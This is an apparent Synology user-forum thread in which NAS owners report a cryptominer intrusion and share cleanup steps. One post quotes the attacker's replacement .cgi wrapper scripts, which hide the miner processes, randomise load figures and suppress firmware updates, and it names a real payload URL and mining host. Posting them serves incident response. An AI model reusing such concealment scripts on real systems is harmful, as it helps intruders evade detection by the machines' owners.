hacked ressource Monitor
Forum rules
We've moved! Head over to Synology Community (community.synology.com) to meet up with our team and other Synology enthusiasts!
We've moved! Head over to Synology Community (community.synology.com) to meet up with our team and other Synology enthusiasts!
Re: hacked ressource Monitor
I deleted the folders and files from root access.
Changed passwords - not sure what else to do. I can shut down access to Survailence from the outside but that defeats the checking in I do while I am not there.
I should turn off remote management - that will be next.
none of it makes sense.
Changed passwords - not sure what else to do. I can shut down access to Survailence from the outside but that defeats the checking in I do while I am not there.
I should turn off remote management - that will be next.
none of it makes sense.
Re: hacked ressource Monitor
Same problem here. More info in a Facebook post:
https://www.facebook.com/synology/posts ... 7533142897
I had web-server (port 80) and DSM https on port 5001 running. All blocked now. Entry probably was one of them.
https://www.facebook.com/synology/posts ... 7533142897
I had web-server (port 80) and DSM https on port 5001 running. All blocked now. Entry probably was one of them.
Re: hacked ressource Monitor
With the amount of changed files it is pretty apparent that we need to reinstall the system. How do we backup all settings and configs and reinstall, without losing /volume1? Is it even possible?
Also, we need to know how they got in and that the security hole is blocked.
Please Synology, reply to these posts, at least that you have seen this and are working on it.
Also, we need to know how they got in and that the security hole is blocked.
Please Synology, reply to these posts, at least that you have seen this and are working on it.
Re: hacked ressource Monitor
I removed the /PWNED directory and mv:ed back the changed .cgi files you mention above. I also updated the DSM to latest and rebooted. Works fine. I am about to manually update the DSM again now with the downloaded .pat file to try to make sure that the system files gets reinstalled. As the upgrade.cgi files seems changed.severed wrote:I too have found I have been hacked and my resource monitor "tampered with" - I guess to hide the massive resource usage from the hackers who ran bitcoin mining software
I got suspicious when my Rack Station started to seem really slow - I logged in ssh and ran TOP and saw 3 processes using 25% CPU - they were called PWNEDm going to an IP address of 46.244.18.176 on port 9555
It seem to download from here: http://65.36.55.70:5000/jynx2.so
I then noticed the PWNED folder -- i was able to kill the three tasks and delete the folder
The tasks were called PWNEDm - upon looking at this with a hex editor it is clearly just "mined" renamed - a BitCoin miner
What is scary is that they seem to know they were running on a DiksStation as some of the files/scripts appear to reference Synology file paths so they can overwirte files and hide their presence.
I am reluctant to reboot as maybe some Synology files are damaged -- I can already see a few scripts such as:
top.cgi:
#!/bin/sh
/usr/syno/synoman/webman/modules/ResourceMonitor/top2.cgi | awk -v RS='[^\n]*\n*[^\n]*(PWNED|top2.cgi)([^\n]*\n){6}' '{print}' ORS=""
upgrade.cgi:
#!/bin/sh
/usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade2.cgi | sed -e 's/\("available_for_download" *: *\).*,/\1 false,/'
rsrcmonitor3.cg1:
#!/bin/sh
rand1=$((RANDOM%10))
rand2=$((RANDOM%10))
rand3=$((RANDOM%10))
rand4=$((RANDOM%10))
rand5=$((RANDOM%10))
rand6=$((RANDOM%10))
/usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor3.cgi | sed -e "s/\(\"15minLoad\" *: *\)[0-9]*\(,*\)/\1$rand1\2/" -e "s/\(\"1minLoad\" *: *\)[0-9]*\(,*\)/\1$rand2\2/" -e "s/\(\"5minLoad\" *: *\)[0-9]*\(,*\)/\1$rand3\2/" -e "s/\(\"OtherLoad\" *: *\)[0-9]*\(,*\)/\1$rand4\2/" -e "s/\(\"SystemLoad\" *: *\)[0-9]*\(,*\)/\1$rand5\2/" -e "s/\(\"UserLoad\" *: *\)[0-9]*\(,*\)/\1$rand6\2/"
These appear to overwrite some Synology files
Before I reboot, what I would like to know is if I look at all the scripts and note down all the files they modify could I copy "clean" files from my DS214+ to my RackStation 2212+ ???
I do have pretty tight password set too -- containing numbers, letters and some punctuation chars -- very weird!
If anyone wants the whole PWNED folder I kept a copy and can email it or goto my blog: http://thesbsguy.com/?p=244
Sev
Re: hacked ressource Monitor
Sadly I could not do a manual upgrade as it says my upgrade file is older than the one I have. It should actually be of the same version. Or the hack prevents me from manual upgrade, somehow.Gozem wrote: I removed the /PWNED directory and mv:ed back the changed .cgi files you mention above. I also updated the DSM to latest and rebooted. Works fine. I am about to manually update the DSM again now with the downloaded .pat file to try to make sure that the system files gets reinstalled. As the upgrade.cgi files seems changed.
Re: hacked ressource Monitor
There seems to be three rsrcmonitor*.cgi: files on my system. rsrcmonitor2.cgi calls rsrcmonitor3.cgi with some random load generated form an .sh-script. However file 1 and 3 are binaries. Which one is correct, and what should they be named? Currently I renamed 3.cgi to 2.cgi and overwriting the sh-script, just as I did with the other files.
Seems to be working correct after a reboot as far as I can tell.
Seems to be working correct after a reboot as far as I can tell.
Re: hacked ressource Monitor
Asking a friend who has the same (unhacked) system as I do and the two rsrcmonitor files seem legit:Gozem wrote:There seems to be three rsrcmonitor*.cgi: files on my system. rsrcmonitor2.cgi calls rsrcmonitor3.cgi with some random load generated form an .sh-script. However file 1 and 3 are binaries. Which one is correct, and what should they be named? Currently I renamed 3.cgi to 2.cgi and overwriting the sh-script, just as I did with the other files.
Seems to be working correct after a reboot as far as I can tell.
> ls -l /usr/syno/synoman/webman/modules/ResourceMonitor
-rw-r--r-- 1 root root 1944 Aug 23 15:33 config
-rw-r--r-- 1 root root 152 Aug 23 15:33 helptoc.conf
drwxr-xr-x 7 root root 4096 Oct 20 10:08 images
-rw-r--r-- 1 root root 179 Aug 23 15:33 index.conf
-rw-r--r-- 1 root root 92150 Aug 23 15:33 resource.js
-rwxr-xr-x 1 root root 86952 Oct 8 09:09 rsrcmonitor.cgi
-rwxr-xr-x 1 root root 61568 Oct 8 09:09 rsrcmonitor2.cgi
-rwxr-xr-x 1 root root 24956 Oct 8 09:09 setting.cgi
-rwxr-xr-x 1 root root 14882 Aug 23 15:33 style.css
-rwxr-xr-x 1 root root 15644 Oct 8 09:09 top.cgi
Re: hacked ressource Monitor
That one is indeed legit and should be renamed back to rsrcmonitor2.cgi
Luckily they were lazy and just renamed the original files.
The new files are just executing the original files and then modify the output (hiding the PWNED processes)
In my case the new files were all with userid 502 and group id 20
You can try and do a recursive search on /:
find / -user 502 -print
I myself didn't find any other files.
As for the failed upgrade, you might want to try and edit the versionnumber of the update (smallfixnumber). the firmware.pat are just compressed files which can be extracted like a zip (just rename to firmware.zip) and then edit the VERSION file to contain a higher number. After that compress everything and rename back to .pat and try to upgrade with that firmware.
Luckily they were lazy and just renamed the original files.
The new files are just executing the original files and then modify the output (hiding the PWNED processes)
In my case the new files were all with userid 502 and group id 20
You can try and do a recursive search on /:
find / -user 502 -print
I myself didn't find any other files.
As for the failed upgrade, you might want to try and edit the versionnumber of the update (smallfixnumber). the firmware.pat are just compressed files which can be extracted like a zip (just rename to firmware.zip) and then edit the VERSION file to contain a higher number. After that compress everything and rename back to .pat and try to upgrade with that firmware.
Last edited by Doolbr on Mon Feb 10, 2014 9:50 pm, edited 2 times in total.
Re: hacked ressource Monitor
I figured that the firmware Synology provide are the base firmware of 4.3-3810. To get update4 you have to patch via the DSM interface. I was probably trying to install DSM 4.3-3810 (update1 or 0).Doolbr wrote: As for the failed upgrade, you might want to try and edit the versionnumber of the update (smallfixnumber). the firmware.pat are just compressed files which can be extracted like a zip (just rename to firmware.zip) and then edit the VERSION file to contain a higher number. After that compress everything and rename back to .pat and try to upgrade with that firmware.
But since noone else has found anymore tampered/bad files I'll wait on bigger actions (full reinstall?) until we know how they came in, and that the security hole is fixes.
-
- I'm New!
- Posts: 5
- Joined: Mon Feb 10, 2014 10:52 pm
Re: hacked ressource Monitor
I also found a \PWNED directory on my DS412+. I deleted the directory, but am a little confused about all the changed files being mentioned here and what to do about it. Which rscrcmonitor*.cgi files are legit and which one(s) do I delete? Do I need to replace the legit/modified rscrcmonitor*.cgi files with clean ones, and if so, where can I find them?
I'm a bit of a linux novice, and new to Synology devices. I just purchased my DS412+ last week. Not a real great feeling getting hacked less than a week into owning the device.
I'm a bit of a linux novice, and new to Synology devices. I just purchased my DS412+ last week. Not a real great feeling getting hacked less than a week into owning the device.

Re: hacked ressource Monitor
I know nothing about the Linux system and commands, I am also running the headless crashplan package.
Not sure what else to do. I dont know how to organize the search for the file changes, too much data to back up as I've been trying to get it into the cloud. Not sure what else to do.
Not sure what else to do. I dont know how to organize the search for the file changes, too much data to back up as I've been trying to get it into the cloud. Not sure what else to do.
Re: hacked ressource Monitor
I will update this post when new info comes in.
Here is how you clean it (so far that I've detected on my DS1812+). Also note that this is not an guarantee that you are 100% clean. We (this thread and the linked Facebook thread) might have missed something.
NOTE: Do this on your own risk!
I write this form memory as I already clean out the files and can't test my instructions again.
1. Either disconnect the Synology from Internet or configure a Firewall in DSM in the Control Panel. Either way, avery angry Firewall (especially on port 80,443,5000 and 5001) is bare minimum since we do not know if this security hole is fixed or not. You might just get infected again.
2. Enable ssh and log in using a command shell in Linux/Mac OSX (or get putty for Windows) as root@your-diskstations-ip with the same password as the user "admin" has.
3. All altered files seems to be owned by user id 502. Run:
Post the result here so we can investigate further.
The above command will search for files starting in / (the root) and look for files with user id 502. -xdev means that it should not enter into new mounted disks, like /volume1 which might take a LOOOONG time if you have a lot of files.
4. kill the bitcoin mining processes. You can easily see them eating of the CPU using the command 'top'. Press q to exit top.
Run:
Possibly also run: (I can't remember if there was one more process running or not. Use to search for PWNED processes and kill them.
5. Remove the /PWNED directory:
6. Move back 3 .cgi files that has been moved and are being called from new hacked copies:
Check that the target files you are about to overwrite are actually shell files: (Yes note the 2.cgi one)
Move back the original files:. Note the change in numbers on the last one.
The forum seems to format the above a bit strange, but it is normal mv command.
7. Possibly reboot your station here to make sure DSM runs on the good .cgi files.
8. Update your DSM to latest.
9. Look for more infections I've read about but I did not have them. Don't know what to do with it exactly if you find it. Probably remove it.
Look for the directory /volume1/startup
All files been altered seems to be from user with id 502.
Try to find more files:
If you have a lot of files on your diskstation that will take a LONG time. To only search in the DSM system areas use:
Please post replies on any errors in my instructions, additions or other help you need.
Here is how you clean it (so far that I've detected on my DS1812+). Also note that this is not an guarantee that you are 100% clean. We (this thread and the linked Facebook thread) might have missed something.
NOTE: Do this on your own risk!
I write this form memory as I already clean out the files and can't test my instructions again.
1. Either disconnect the Synology from Internet or configure a Firewall in DSM in the Control Panel. Either way, avery angry Firewall (especially on port 80,443,5000 and 5001) is bare minimum since we do not know if this security hole is fixed or not. You might just get infected again.
2. Enable ssh and log in using a command shell in Linux/Mac OSX (or get putty for Windows) as root@your-diskstations-ip with the same password as the user "admin" has.
3. All altered files seems to be owned by user id 502. Run:
Code: Select all
find / -xdev -user 502
The above command will search for files starting in / (the root) and look for files with user id 502. -xdev means that it should not enter into new mounted disks, like /volume1 which might take a LOOOONG time if you have a lot of files.
4. kill the bitcoin mining processes. You can easily see them eating of the CPU using the command 'top'. Press q to exit top.
Run:
Code: Select all
killall PWNEDm
Code: Select all
killall PWNEDb
Code: Select all
ps |grep PWNED
5. Remove the /PWNED directory:
Code: Select all
rm -r /PWNED
Check that the target files you are about to overwrite are actually shell files:
Code: Select all
more /usr/syno/synoman/webman/modules/ResourceMonitor/top.cgi
more /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade.cgi
more /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor2.cgi
Move back the original files:. Note the change in numbers on the last one.
Code: Select all
mv /usr/syno/synoman/webman/modules/ResourceMonitor/top2.cgi /usr/syno/synoman/webman/modules/ResourceMonitor/top.cgi
mv /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade2.cgi /usr/syno/synoman/webman/modules/ControlPanel/modules/upgrade.cgi
mv /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor3.cgi /usr/syno/synoman/webman/modules/ResourceMonitor/rsrcmonitor2.cgi
7. Possibly reboot your station here to make sure DSM runs on the good .cgi files.
8. Update your DSM to latest.
9. Look for more infections I've read about but I did not have them. Don't know what to do with it exactly if you find it. Probably remove it.
Look for the directory /volume1/startup
All files been altered seems to be from user with id 502.
Try to find more files:
Code: Select all
find / -user 502
Code: Select all
find / -xdev -user 502
Last edited by Gozem on Tue Feb 11, 2014 12:16 pm, edited 2 times in total.
Re: hacked ressource Monitor
Sorry, that was my mistake, it was uid 502
Luckily, i could still find it in my terminal backlog, added a screenshot:

Luckily, i could still find it in my terminal backlog, added a screenshot:

Code: Select all
> ls -l
-rw-r--r-- 1 root root 1944 Nov 5 22:53 config
-rw-r--r-- 1 root root 152 Nov 5 22:53 helptoc.conf
drwxr-xr-x 7 root root 4096 Nov 16 22:56 images
-rw-r--r-- 1 root root 179 Nov 5 22:53 index.conf
-rw-r--r-- 1 root root 92150 Nov 5 22:53 resource.js
-rwxr-xr-x 1 root root 86952 Nov 5 22:53 rsrcmonitor.cgi
-rwxr-xr-x 1 502 20 532 Feb 3 17:40 rsrcmonitor2.cgi
-rwxr-xr-x 1 root root 61568 Nov 5 22:53 rsrcmonitor3.cgi
-rwxr-xr-x 1 root root 24956 Nov 5 22:53 setting.cgi
-rwxr-xr-x 1 root root 14882 Nov 5 22:53 style.css
-rwxr-xr-x 1 root root 15644 Nov 5 22:53 top.cgi
Re: hacked ressource Monitor
Here are a few bugs probably related to this:
http://www.cvedetails.com/vulnerability ... ology.html
http://web.nvd.nist.gov/view/vuln/detai ... -2013-6955
The release notes doesn't give much hints:
http://www.synology.com/en-global/relea ... del/DS1812+
Synology: Please hi-light security issues better in your notes.
http://www.cvedetails.com/vulnerability ... ology.html
http://web.nvd.nist.gov/view/vuln/detai ... -2013-6955
The release notes doesn't give much hints:
http://www.synology.com/en-global/relea ... del/DS1812+
Synology: Please hi-light security issues better in your notes.
Re: hacked ressource Monitor
I already had Update 3.Multiple directory traversal vulnerabilities in the FileBrowser components in Synology DiskStation Manager (DSM) before 4.3-3810 Update 3